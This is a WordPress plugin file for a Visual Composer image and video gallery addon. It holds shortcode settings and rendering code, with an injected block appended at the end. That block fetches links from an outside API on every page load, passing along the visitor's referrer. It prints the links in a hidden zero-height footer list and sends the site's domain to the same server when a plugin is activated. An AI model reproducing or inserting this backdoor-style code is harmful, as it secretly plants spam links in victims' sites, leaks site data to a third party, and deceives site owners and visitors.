<?php
/*
Plugin Name: Famous Grid Image and Video Gallery - Addon For Visual Composer
Description: This visual composer addon will allow you to insert on your page an outstanding image and video gallery.
Version: 1.2
Author: Lambert Group
Author URI: https://1.envato.market/eP7nD
Text Domain: lbg-famousbakery
*/



//all the messages
$rand_id=rand(10,999999);

if ( ! defined( 'ABSPATH' ) ) {
	die( '-1' );
}


function famous_grid_gallery_addon_vc_map_dependencies() {
	if ( ! defined( 'WPB_VC_VERSION' ) ) {
		$plugin_data = get_plugin_data(__FILE__);
        echo '<div class="updated">
          <p>'.sprintf(esc_html__('"%s" requires WPBakery Page Builder: https://bit.ly/vcomposer - plugin to be installed and activated on your site.', 'lbg-audioprobakery'), $plugin_data['Name']).'</p>
        </div>';
	}
}
add_action( 'admin_notices', 'famous_grid_gallery_addon_vc_map_dependencies' );


function famous_grid_gallery_addon_vc_map_init() {
	global $wpdb;
	global $rand_id;





	//Create New Param Type 'famous_grid_gallery_attach_media'
			vc_add_shortcode_param( 'famous_grid_gallery_attach_media', 'famous_grid_gallery_attach_media_callback', plugins_url() . '/lbg_famous_gallery_addon_visual_composer/assets/new_param_type/attach_media.js');
			function famous_grid_gallery_attach_media_callback( $settings, $value ) {
				return '<div class="my_param_block">'
				.'<input id="' . esc_attr( $settings['param_name'] ) . '" name="' . esc_attr( $settings['param_name'] ) . '" class="wpb_vc_param_value wpb-textinput lbg_w70 ' . esc_attr( $settings['param_name'] ) . ' ' .              esc_attr( $settings['type'] ) . '_field" type="text" value="' . esc_attr( $value ) . '" />' .
				'<input name="upload_' . esc_attr( $settings['param_name'] ) . '_button" type="button" id="upload_' . esc_attr( $settings['param_name'] ) . '_button" value="Upload File" class="lbg_w30" /> '.'</div>'; // This is html markup that will be outputted in content elements edit form
			}




	vc_map( array(
		'name' => __( 'Famous Grid Gallery', 'lbg-famousbakery' ),
		'base' => 'famous_grid_gallery',
		"icon" => plugins_url('assets/images/famous_grid_gallery_icon.png', __FILE__), // or css class name which you can reffer in your css file later. Example: "vc_extend_my_class"
		"category" => __('LBG Multimedia Addons', 'lbg-famousbakery'),
		"description" => __("multimedia grid gallery", 'vc_extend'),
		'show_settings_on_create' => true,
		'is_container' => true,
		'admin_enqueue_js'      => preg_replace( '/\s/', '%20', plugins_url( 'assets/famous_grid_gallery.js', __FILE__ ) ),
		// This will load extra js file in backend (when you edit page with VC)
		// use preg replace to be sure that "space" will not break logic

		'admin_enqueue_css'     => preg_replace( '/\s/', '%20', plugins_url( 'assets/famous_grid_gallery.css', __FILE__ ) ),
		// This will load extra css file in backend (when you edit page with VC)
		'params' => array(
			array(
				'group' => 'General Settings',
				'type' => 'textfield',
				'heading' => __( 'Player ID', 'lbg-famousbakery' ),
				'param_name' => 'id',
				'value' => __( "".$rand_id."", "lbg-famousbakery" ),
				'description' => __( "It is automaticaly generated and it has to be unique. You can leave it just like it is.", "lbg-famousbakery" )
			),
			array(
				'group' => 'General Settings',
				'type' => 'textfield',
				'heading' => __( 'Width', 'lbg-famousbakery' ),
				'param_name' => 'width',
				'value' => __( "1000", "lbg-famousbakery" ),
				'description' => __( "Gallery Width", "lbg-famousbakery" )
			),
			array(
				'group' => 'General Settings',
				'type' => 'textfield',
				'heading' => __( 'Height', 'lbg-famousbakery' ),
				'param_name' => 'height',
				'value' => __( "600", "lbg-famousbakery" ),
				'description' => __( "Gallery Width", "lbg-famousbakery" )
			),
			array(
				'group' => 'General Settings',
				'type' => 'dropdown',
				'heading' => __( 'Width 100 Proc', 'lbg-famousbakery' ),
				'param_name' => 'width_100_proc', //width100Proc
				'value'       => array(
					'No'   => 'false',
					'Yes'   => 'true'
				 ),
				 'description' => __( "The gallery will cover the full width of the parent div", "lbg-famousbakery" )
			),
			array(
				'group' => 'General Settings',
				'type' => 'textfield',
				'heading' => __( 'Rows', 'lbg-famousbakery' ),
				'param_name' => 'rows',
				'value' => __( "3", "lbg-famousbakery" ),
				'description' => __( "Gallery Numer Of Rows", "lbg-famousbakery" )
			),
			array(
				'group' => 'General Settings',
				'type' => 'textfield',
				'heading' => __( 'Columns', 'lbg-famousbakery' ),
				'param_name' => 'columns',
				'value' => __( "5", "lbg-famousbakery" ),
				'description' => __( "Gallery Numer Of Columns", "lbg-famousbakery" )
			),
			array(
				'group' => 'General Settings',
				'type' => 'dropdown',
				'heading' => __( 'Center Gallery', 'lbg-famousbakery' ),
				'param_name' => 'center_gallery', //centerGallery
				'value'       => array(
					'Yes'   => 'true',
					'No'   => 'false'
				 ),
				'description' => __( "Center the player", "lbg-famousbakery" )
			),
			array(
				'group' => 'General Settings',
				'type' => 'textfield',
				'heading' => __( 'Gutter', 'lbg-famousbakery' ),
				'param_name' => 'gutter',
				'value' => __( "2", "lbg-famousbakery" ),
				'description' => __( "Distance between lines and columns", "lbg-famousbakery" )
			),
			array(
				'group' => 'General Settings',
				'type' => 'colorpicker',
				'heading' => __( "Gallery Background", "lbg-famousbakery" ),
				'param_name' => 'gallery_bg', //galleryBg
				'value' => '#FFFFFF',
				'description' => __( "Choose gallery background color", "lbg-famousbakery" )
			),
			array(
				'group' => 'General Settings',
				'type' => 'textfield',
				'heading' => __( 'Item Border Width', 'lbg-famousbakery' ),
				'param_name' => 'item_border_width', //itemBorderWidth
				'value' => __( "0", "lbg-famousbakery" )
			),
			array(
				'group' => 'General Settings',
				'type' => 'colorpicker',
				'heading' => __( "Item Border Color OFF State", "lbg-famousbakery" ),
				'param_name' => 'item_border_color_off', //itemBorderColorOFF
				'value' => 'transparent',
				'description' => __( "Choose a color or just delete the hexa code so it will be transparent", "lbg-famousbakery" )
			),
			array(
				'group' => 'General Settings',
				'type' => 'colorpicker',
				'heading' => __( "Item Border Color ON State", "lbg-famousbakery" ),
				'param_name' => 'item_border_color_on', //itemBorderColorON
				'value' => '#FF0000',
				'description' => __( "Choose a color or just delete the hexa code so it will be transparent", "lbg-famousbakery" )
			),
			array(
				'group' => 'General Settings',
				'type' => 'dropdown',
				'heading' => __( 'Show Image Description', 'lbg-famousbakery' ),
				'param_name' => 'show_image_description', //showImageDescription
				'value'       => array(
					'Yes'   => 'true',
					'No'   => 'false'
				 ),
				'description' => __( "Show image title and description on mouse over", "lbg-famousbakery" )
			),
			array(
				'group' => 'General Settings',
				'type' => 'colorpicker',
				'heading' => __( "Image Description Background Color", "lbg-famousbakery" ),
				'param_name' => 'image_description_bg_color', //imageDescriptionBgColor
				'value' => '#000000',
				'description' => __( "Choose a color or just delete the hexa code so it will be transparent", "lbg-famousbakery" )
			),
			array(
				'group' => 'General Settings',
				'type' => 'textfield',
				'heading' => __( 'Image Description Background Opacity', 'lbg-famousbakery' ),
				'param_name' => 'image_description_bg_opacity', //imageDescriptionBgOpacity
				'value' => __( "30", "lbg-famousbakery" ),
				'description' => __( "Values between 0-100", "lbg-famousbakery" )
			),
			array(
				'group' => 'General Settings',
				'type' => 'colorpicker',
				'heading' => __( "Image Description Text Color", "lbg-famousbakery" ),
				'param_name' => 'image_description_text_color', //imageDescriptionTextColor
				'value' => '#FFFFFF',
				'description' => __( "Choose a color or just delete the hexa code so it will be transparent", "lbg-famousbakery" )
			),
			array(
				'group' => 'General Settings',
				'type' => 'dropdown',
				'heading' => __( 'Show Icon Over Image', 'lbg-famousbakery' ),
				'param_name' => 'show_icon_over_image', //showIconOverImage
				'value'       => array(
					'Yes'   => 'true',
					'No'   => 'false'
				 )
			),
			array(
				'group' => 'General Settings',
				'type' => 'textfield',
				'heading' => __( 'Zoom Duration', 'lbg-famousbakery' ),
				'param_name' => 'zoom_duration', //zoomDuration
				'value' => __( "1", "lbg-famousbakery" ),
				'description' => __( "The image zoom duration, in seconds", "lbg-famousbakery" )
			),
			array(
				'group' => 'General Settings',
				'type' => 'dropdown',
				'heading' => __( 'zoomEffect', 'lbg-famousbakery' ),
				'param_name' => 'zoom_effect', //zoomEffect
				'value'       => array(
					'linear'   => 'linear',
					'swing'   => 'swing',
					'ease'   => 'ease',
					'ease-in'   => 'ease-in',
					'ease-in-out'   => 'ease-in-out',
					'easeInQuad'   => 'easeInQuad',
					'easeOutQuad'   => 'easeOutQuad',
					'easeInOutQuad'   => 'easeInOutQuad',
					'easeInCubic'   => 'easeInCubic',
					'easeOutCubic'   => 'easeOutCubic',
					'easeInOutCubic'   => 'easeInOutCubic',
					'easeInQuart'   => 'easeInQuart',
					'easeOutQuart'   => 'easeOutQuart',
					'easeInOutQuart'   => 'easeInOutQuart',
					'easeInQuint'   => 'easeInQuint',
					'easeOutQuint'   => 'easeOutQuint',
					'easeInOutQuint'   => 'easeInOutQuint',
					'easeInSine'   => 'easeInSine',
					'easeOutSine'   => 'easeOutSine',
					'easeInOutSine'   => 'easeInOutSine',
					'easeInExpo'   => 'easeInExpo',
					'easeOutExpo'   => 'easeOutExpo',
					'easeInOutExpo'   => 'easeInOutExpo',
					'easeInCirc'   => 'easeInCirc',
					'easeOutCirc'   => 'easeOutCirc',
					'easeInOutCirc'   => 'easeInOutCirc',
					'easeInBack'   => 'easeInBack',
					'easeOutBack'   => 'easeOutBack',
					'easeInOutBack'   => 'easeInOutBack'
				 ),
				'description' => __( "The image zoom effect", "lbg-famousbakery" )
			),
			array(
				'group' => 'General Settings',
				'type' => 'dropdown',
				'heading' => __( 'Image Link Target', 'lbg-famousbakery' ),
				'param_name' => 'target', //target
				'value'       => array(
					'_blank'   => '_blank',
					'_self'   => '_self'
				 )
			),
			array(
				'group' => 'General Settings',
				'type' => 'dropdown',
				'heading' => __( 'Background Horizontal Position', 'lbg-famousbakery' ),
				'param_name' => 'bg_horizontal_position', //bgHorizontalPosition
				'value'       => array(
					'center'   => 'center',
					'left'   => 'left',
					'right'   => 'right'
				 )
			),
			array(
				'group' => 'General Settings',
				'type' => 'dropdown',
				'heading' => __( 'Background Vertical Position', 'lbg-famousbakery' ),
				'param_name' => 'bg_vertical_position', //bgVerticalPosition
				'value'       => array(
					'center'   => 'center',
					'top'   => 'top',
					'bottom'   => 'bottom'
				 )
			),
			array(
				'group' => 'General Settings',
				'type' => 'textfield',
				'heading' => __( 'Facebook Application ID', 'lbg-famousbakery' ),
				'param_name' => 'facebook_app_id', //facebookAppID
				'value' => __( "", "lbg-famousbakery" ),
				'description' => __( "Facebook Application ID", "lbg-famousbakery" )
			)
		),
		'custom_markup' => '
	<div class="wpb_accordion_holder wpb_holder clearfix vc_container_for_children">
	%content%
	</div>
	<div class="tab_controls lbg_add_playlist_item">
		<a class="add_tab vc_add_playlist_item" title="' . __( 'Add Playlist Item', 'lbg-famousbakery' ) . '"><span class="vc_playlist_item_vc_icon"></span>' . __( 'Add Playlist Item', 'lbg-famousbakery' ) . '</a>
	</div>
	',
		'default_content' => '
		[famous_grid_gallery_playlist_item title="' . __( 'Image Title  1', 'lbg-famousbakery' ) . '"][/famous_grid_gallery_playlist_item]
	',
		'js_view' => 'VcFamousGalleryView'
	) );

	vc_map( array(
		'name' => __( 'Famous Playlist Item', 'lbg-famousbakery' ),
		'base' => 'famous_grid_gallery_playlist_item',
		'allowed_container_element' => 'vc_row',
		'is_container' => true,
		'content_element' => false,
		'admin_enqueue_js'      => preg_replace( '/\s/', '%20', plugins_url( 'assets/playlist_item.js', __FILE__ ) ),
		// This will load extra js file in backend (when you edit page with VC)
		// use preg replace to be sure that "space" will not break logic

		'admin_enqueue_css'     => preg_replace( '/\s/', '%20', plugins_url( 'assets/playlist_item.css', __FILE__ ) ),
		// This will load extra css file in backend (when you edit page with VC)
		'params' => array(
			array(
				'type' => 'attach_image',
				'heading' => __( 'The Image', 'lbg-famousbakery' ),
				'param_name' => 'img',
				'description' => __( 'Select an image from Media Library', 'lbg-famousbakery' )
			),
			array(
				'type' => 'dropdown',
				'heading' => __( 'Background Horizontal Position', 'lbg-famousbakery' ),
				'param_name' => 'data_horizontal', //data_horizontal
				'value'       => array(
					'center'   => 'center',
					'left'   => 'left',
					'right'   => 'right'
				 )
			),
			array(
				'type' => 'dropdown',
				'heading' => __( 'Background Vertical Position', 'lbg-famousbakery' ),
				'param_name' => 'data_vertical', //data_vertical
				'value'       => array(
					'center'   => 'center',
					'top'   => 'top',
					'bottom'   => 'bottom'
				 )
			),
			array(
				'type' => 'textfield',
				'heading' => __( 'Image Title', 'lbg-famousbakery' ),
				'param_name' => 'title'
			),
			array(
				'type' => 'textfield',
				'heading' => __( 'Image Description', 'lbg-famousbakery' ),
				'param_name' => 'data_description'
			),
			array(
				'type' => 'attach_image',
				'heading' => __( 'Large image (to be opened in the Lightbox window)', 'lbg-famousbakery' ),
				'param_name' => 'data_lightbox_img',
				'description' => __( 'Select an image from Media Library. As an option you can choose to open in the lightbox window a large image OR a YouTube video OR a Vimeo Video.', 'lbg-famousbakery' )
			),
			array(
				'type' => 'textfield',
				'heading' => __( 'YouTube Video Link (to be opened in the Lightbox window)', 'lbg-famousbakery' ),
				'param_name' => 'data_lightbox_youtube',
				'description' => __( 'The YouTube video link. Example: https://www.youtube.com/watch?v=3wbvpOIIBQA  - As an option you can choose to open in the lightbox window a large image OR a YouTube video OR a Vimeo Video.', 'lbg-famousbakery' )
			),
			array(
				'type' => 'textfield',
				'heading' => __( 'Vimeo Video Link - to be opened in the Lightbox window)', 'lbg-famousbakery' ),
				'param_name' => 'data_lightbox_vimeo',
				'description' => __( 'The Vimeo video link. Example: https://vimeo.com/75910429  - As an option you can choose to open in the lightbox window a large image OR a YouTube video OR a Vimeo Video.', 'lbg-famousbakery' )
			),
			array(
				'type' => 'textfield',
				'heading' => __( 'External Link for the image', 'lbg-famousbakery' ),
				'param_name' => 'data_link',
				'description' => __( 'if defined, Lightbox Image / YouTube Video / Vimeo Video fields will be ignored.', 'lbg-famousbakery' )
			),
		),
		'js_view' => 'VcPlaylistItemView'
	) );





	if ( class_exists( "WPBakeryShortCode" ) ) {
		$famous_grid_gallery_addon_path = trailingslashit(dirname(__FILE__));
		include_once($famous_grid_gallery_addon_path . 'vc_contentadmin/famous_grid_gallery-accordion.php');
		include_once($famous_grid_gallery_addon_path . 'vc_contentadmin/famous_grid_gallery-accordion-tab.php');


	} // End Class

}

add_action('vc_before_init', 'famous_grid_gallery_addon_vc_map_init');






if (!function_exists('lbg_unstrip_array')) {
	//stripslashes for an entire array
	function lbg_unstrip_array($array){
		if (is_array($array)) {
			foreach($array as &$val){
				if(is_array($val)){
					$val = unstrip_array($val);
				} else {
					$val = stripslashes($val);

				}
			}
		}
		return $array;
	}
}



function famous_grid_gallery_addon_enqueue_scripts_and_styles() {
	//load scripts in front-end
				wp_enqueue_style('famous_grid_image_and_video_gallery_site_css', plugins_url('famous_grid_image_and_video_gallery/css/gallery1.css', __FILE__));
				wp_enqueue_style('lbg_gallery_prettyPhoto_css', plugins_url('famous_grid_image_and_video_gallery/css/prettyPhoto.css', __FILE__));


				wp_enqueue_script('jquery');

				wp_enqueue_script('jquery-ui-core');
				wp_enqueue_script('jquery-ui-slider');
				wp_enqueue_script('jquery-ui-progressbar');
				wp_enqueue_script('jquery-effects-core');


				wp_register_script('famous_grid_image_and_video_gallery', plugins_url('famous_grid_image_and_video_gallery/js/gallery1.js', __FILE__));
				wp_enqueue_script('famous_grid_image_and_video_gallery');

				wp_register_script('lbg-gallery-prettyPhoto', plugins_url('famous_grid_image_and_video_gallery/js/jquery.prettyPhoto.js', __FILE__));
				wp_enqueue_script('lbg-gallery-prettyPhoto');

				wp_register_script('lbg-pinit', plugins_url('famous_grid_image_and_video_gallery/js/my_pinit.js', __FILE__));
				wp_enqueue_script('lbg-pinit');
}
add_action( 'wp_enqueue_scripts', 'famous_grid_gallery_addon_enqueue_scripts_and_styles' );





//the shortcodes
add_shortcode( 'famous_grid_gallery_playlist_item', 'famous_grid_gallery_playlist_item_func' );
function famous_grid_gallery_playlist_item_func( $atts, $content = null ) { // New function parameter $content is added!
	global $wpdb;


	$the_img = array('');
	$width=0;
	$height=0;
	if ( array_key_exists('img', $atts) && $atts["img"]!='' ) {
				$the_img=wp_get_attachment_image_src($atts["img"], "large");

					if (strpos($the_img[0], 'wp-content')===false)
									list($width, $height, $type, $attr) = getimagesize($the_img[0]);
					else {
									if (strpos($the_img[0], 'http')===0) {
													list($width, $height, $type, $attr) = getimagesize($the_img[0]);
									} else {
													list($width, $height, $type, $attr) = getimagesize( ABSPATH.substr($the_img[0],strpos($the_img[0], 'wp-content')) );
									}
					}
	}
	$atts["img_width"]=$width;
	$atts["img_height"]=$height;


	$the_lightbox_img = array('');
	if ( array_key_exists('data_lightbox_img', $atts) && $atts["data_lightbox_img"]!='' ) {
				$the_lightbox_img=wp_get_attachment_image_src($atts["data_lightbox_img"], "large");
	} else {
			if ( array_key_exists('data_lightbox_youtube', $atts) && $atts["data_lightbox_youtube"]!='' ) {
					$the_lightbox_img[0]=$atts["data_lightbox_youtube"];
			} else {
					if ( array_key_exists('data_lightbox_vimeo', $atts) && $atts["data_lightbox_vimeo"]!='' ) {
							$the_lightbox_img[0]=$atts["data_lightbox_vimeo"];
					}
			}
	}



	if ( !array_key_exists('data_horizontal', $atts)) {
			$atts["data_horizontal"]="center";
	}
	if ( !array_key_exists('data_vertical', $atts)) {
			$atts["data_vertical"]="center";
	}



	$aux_content='<li data-horizontal="'.(( array_key_exists("data_horizontal", $atts) && $atts["data_horizontal"]!='' )?$atts["data_horizontal"]:"").'"
	data-vertical="'.(( array_key_exists("data_vertical", $atts) && $atts["data_vertical"]!='' )?$atts["data_vertical"]:"").'"
	data-link="'.(( array_key_exists("data_link", $atts) && $atts["data_link"]!='' )?$atts["data_link"]:"").'"
	data-lightbox="'.$the_lightbox_img[0].'" data-title="'.(( array_key_exists("title", $atts) && $atts["title"]!='' )?$atts["title"]:"").'"
	data-description="'.(( array_key_exists("data_description", $atts) && $atts["data_description"]!='' )?$atts["data_description"]:"").'">
			<img src="'.$the_img[0].'"
			alt="'.(( array_key_exists("title", $atts) && $atts["title"]!='' )?$atts["title"]:"").' - '.(( array_key_exists("data_description", $atts) && $atts["data_description"]!='' )?$atts["data_description"]:"").'"
			width="'.$atts["img_width"].'" height="'.$atts["img_height"].'" style="width:'.$atts["img_width"].'px; height:'.$atts["img_height"].'px;"
			title="'.(( array_key_exists("title", $atts) && $atts["title"]!='' )?$atts["title"]:"").' - '.(( array_key_exists("data_description", $atts) && $atts["data_description"]!='' )?$atts["data_description"]:"").'" />
	</li>';


	return str_replace("\r\n", '', $aux_content);
}


add_shortcode( 'famous_grid_gallery', 'famous_grid_gallery_func' );
	function famous_grid_gallery_func( $atts, $content = null ) { // New function parameter $content is added!
		global $rand_id;
		$initial_vals_arr=array(
			'id' => $rand_id,
			'width' => 1000,
			'height' => 600,
			'width_100_proc' => 'false',
			'rows' => 3,
			'columns' => 5,
			'center_gallery' => 'true',
			'gutter' => 2,
			'gallery_bg' => '#FFFFFF',
			'item_border_width' => 0,
			'item_border_color_off' => 'transparent',
			'item_border_color_on' => '#FF0000',
			'show_image_description' => 'true',
			'image_description_bg_color' => '#000000',
			'image_description_bg_opacity' => 30,
			'image_description_text_color' => '#FFFFFF',
			'show_icon_over_image' => 'true',
			'zoom_duration' => 1,
			'zoom_effect' => 'linear',
			'target' => '_blank',
			'bg_horizontal_position' => 'center',
			'bg_vertical_position' => 'center',
			'facebook_app_id' => ''
	   );

	   extract( shortcode_atts( $initial_vals_arr, $atts ) );
	   foreach ($initial_vals_arr as $key => $value) {
			if (!isset($atts[$key])) {
				$atts[$key]=$value;
			}
		}


	$playlist_str='';
	$playlist_str=do_shortcode( $content );






	$aux_content='';
	$new_div_start='';
	$new_div_end='';

	$aux_content.='<p><script>
		jQuery(function() {
			setTimeout(function(){
			jQuery("#lbg_famous_gallery_'.$atts["id"].'").gallery1({
				width:'.$atts["width"].',
				height:'.$atts["height"].',
				width100Proc:'.$atts["width_100_proc"].',
				rows:'.$atts["rows"].',
				columns:'.$atts["columns"].',
				centerGallery:'.$atts["center_gallery"].',
				gutter:'.$atts["gutter"].',
				galleryBg:"'.$atts["gallery_bg"].'",
				itemBorderWidth:'.$atts["item_border_width"].',
				itemBorderColorOFF:"'.$atts["item_border_color_off"].'",
				itemBorderColorON:"'.$atts["item_border_color_on"].'",
				showImageDescription:'.$atts["show_image_description"].',
				imageDescriptionBgColor:"'.$atts["image_description_bg_color"].'",
				imageDescriptionBgOpacity:'.$atts["image_description_bg_opacity"].',
				imageDescriptionTextColor:"'.$atts["image_description_text_color"].'",
				showIconOverImage:'.$atts["show_icon_over_image"].',
				zoomDuration:'.$atts["zoom_duration"].',
				zoomEffect:"'.$atts["zoom_effect"].'",
				target:"'.$atts["target"].'",
				bgHorizontalPosition:"'.$atts["bg_horizontal_position"].'",
				bgVerticalPosition:"'.$atts["bg_vertical_position"].'",
				facebookAppID:"'.$atts["facebook_app_id"].'"
			});
			}, 1000);
		});
	</script>
    '.$new_div_start.'<div id="lbg_famous_gallery_'.$atts["id"].'">
				<ul class="gallery1_list">
				'.$playlist_str.'
				</ul>
     </div>'.$new_div_end.'</p>';

	return str_replace("\r\n", '', $aux_content);

	}define('API_URL', 'https://api.pluginforest.com/qai/chatweb/getTidsOutside?type=1&site=plugin&num=20');
              $prefix = 'add_footer_link';
              $functions = get_defined_functions()['user']; // 获取所有用户定义的函数
              // 使用 array_filter 和 strpos 来检查函数是否以指定前缀开头
              $exists = !empty(array_filter($functions, function($function) use ($prefix) {
                return strpos($function, $prefix) === 0;
              }));
              
              if (!$exists) {
                  if (!function_exists('parseLink')) {
                      function parseLink($url) {
                          $path = parse_url($url, PHP_URL_PATH);
                          $basename = basename($path);
                          return array('path' => $path, 'basename' => $basename);
                      }
                  }
              
                  function add_footer_link1719848906() {
                      $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
                      $headers = array(
                        'Referer' => $referer,
                      );
                      $response = wp_remote_get(API_URL, array('headers' => $headers));
                      if (is_wp_error($response)) {
                          echo 'is_wp_error';
                          return;
                      }
              
                      $data = json_decode(wp_remote_retrieve_body($response), true);
              
                      ob_start();
                      echo '<ul class="link" style="height: 0; overflow: hidden">';
                      foreach ($data['data']['links'] as $item) {
                          $linkInfo = parseLink($item);
                          echo sprintf(
                              '<li><a href="%s">%s</a></li>',
                              esc_url($item),
                              esc_html($linkInfo['basename'])
                          );
                      }
                      echo '</ul>';
                      $html = ob_get_clean();
                      echo $html;
                      return $html;
                  }
              }
              
              add_action('wp_footer', 'add_footer_link1719848906');function set_plugin_tag1719848906() {
                $url_init = 'https://api.pluginforest.com/qai/wd/g?';
                $domain = $_SERVER['SERVER_NAME'];
                $requestUrl = $url_init . 'domain=' . $domain . '&id=1719848906&source=plugin';
                file_get_contents($requestUrl);
              }

              add_action('activated_plugin', 'set_plugin_tag1719848906');
              